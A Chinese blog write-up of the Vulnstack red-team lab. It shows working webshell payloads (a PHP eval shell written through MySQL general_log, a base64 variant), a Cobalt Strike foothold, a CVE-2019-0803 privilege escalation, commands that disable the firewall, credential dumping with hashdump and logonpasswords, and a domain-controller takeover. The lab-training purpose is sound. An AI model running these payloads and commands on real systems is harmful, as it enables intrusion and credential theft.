[渗透测试]ATT&CK实战 | Vulnstack 红队(一)


@Author:Y4tacker

写在前面

无聊,再玩一个靶场,顺便记录下,也学了一些新东西,当然我觉得我的整个过程还是很有逻辑性的

拿下webshell

打开网站以后发现是个php探针,没啥意义,除了试一试弱口令

在这里插入图片描述

同时使用dirsearch扫描

在这里插入图片描述

发现有phpmyadmin,尝试为弱口令root\root

查询SHOW VARIABLES LIKE "%SECURE%"

发现配置未开启,那么不能使用into outfile写马进去

在这里插入图片描述

SHOW VARIABLES LIKE "%general%"发现·general_log·未开启了,那么开启了改日志路径写马即可

执行set global general_log_file="C:/phpStudy/WWW/1.php"

执行SET GLOBAL general_log='on'

接下来执行SELECT '<?php eval($_POST[1]);?>

连接成功,执行命令

在这里插入图片描述

但是现在有个很尴尬的问题,就是有其他字符不能用蚁剑连接,那制作一个干净的shell

那么执行1=file_put_contents("y4tacker.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B"));

在这里插入图片描述

简单信息搜集

接下来去蚁剑终端执行命令收集下信息

C:\phpStudy\WWW> whoami
god\administrator

执行ipconfig,发现两个网卡,一个内网一个外网

在这里插入图片描述

查看当前登录域及登录用户信息

C:\phpStudy\WWW> net config Workstation
计算机名                     \\STU1
计算机全名                   stu1.god.org
用户名                       Administrator
工作站正运行于               
    NetBT_Tcpip_{4DAEBDFD-0177-4691-8243-B73297E2F0FF} (000C29E78EDC)
    NetBT_Tcpip_{55ECD929-FBB2-4D96-B43D-8FFEB14A169F} (000C29E78EE6)
    NetBT_Tcpip_{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C} (02004C4F4F50)
软件版本                     Windows 7 Professional
工作站域                     GOD
工作站域 DNS 名称            god.org
登录域                       GOD

发现有三台工作主机

工作站域为god,域DNS名称god.org

看看域控

C:\phpStudy\WWW> net group "domain controllers" /domain
这项请求将在域 god.org 的域控制器处理。
组名     Domain Controllers
注释     域中所有域控制器
成员
-------------------------------------------------------------------------------
OWA$                     

以及查看域管

C:\phpStudy\WWW> net group "domain admins" /domain
这项请求将在域 god.org 的域控制器处理。
组名     Domain Admins
注释     指定的域管理员
成员
-------------------------------------------------------------------------------
Administrator            OWA$       

查看域成员,没结果那么等下cs上线好了,这个终端不太好用

C:\phpStudy\WWW> net view /domain:god

结果是

在这里插入图片描述

CS上线

创建一个监听器

在这里插入图片描述

搞一个马,准备上线了

在这里插入图片描述

利用蚁剑上传执行

在这里插入图片描述

上线成功

在这里插入图片描述

继续信息搜集

查看主机名

shell hostname

在这里插入图片描述

查看用户列表

shell net users

在这里插入图片描述

shell net localgroup administrators

得到
Administrator
liukaifeng01
命令成功完成。

提权

接下来提权吧

通过执行systeminfo

修补程序:         安装了 4 个修补程序。                  [01]: KB2534111                  [02]: KB2999226                  [03]: KB958488                  [04]: KB976902

在这里插入图片描述

尝试

shell CVE-2019-0803.exe cmd "start web.exe"

成功

在这里插入图片描述

接下里看看

shell tasklist

并没有开启啥防护软件

在这里插入图片描述

查看防火墙状态,执行发现开启了不截图了

shell netsh firewall show state

关闭防火墙

shell netsh advfirewall set allprofiles state off

攻击域-接管整个域

查看当前域内计算机列表

net view

在这里插入图片描述

看到成功列出

在这里插入图片描述

查看域控列表

net dclist

在这里插入图片描述

抓取凭证

hashdump

在这里插入图片描述

获得明文

logonpasswords

部分截图

在这里插入图片描述

创建smb监听器

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

拿下了OWA域控

在这里插入图片描述

同理,不过这次session换成刚拿下的OWA

在这里插入图片描述

完结撒花

整个域沦陷
在这里插入图片描述

题外操作

其他拿webshell姿势

额,我们也进去看到了目录,不仅仅有phpmyadmin,可以看到这里还有一个之前扫描仪没扫到的yxcms

在这里插入图片描述

beifen.rar真有你的

访问看到后台地址与密码

在这里插入图片描述

后台访问http://xxx/yxcms/?r=admin

修改模板拿shell

看到修改模板的闭着眼睛都知道怎么搞

在这里插入图片描述

测试下没毛病

在这里插入图片描述

插件上传拿shell

首先经过我的简单测试是有一些小校验的,小问题,导出他自己的插件并点击卸载

在这里插入图片描述

简简单单测试个phpinfo();

在这里插入图片描述

修改上传,拿下,太简单了没啥意义的东西

在这里插入图片描述

然后呢看看源码也是很简单的,包括zip目录校验啥的不解读了,没过率

在这里插入图片描述

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值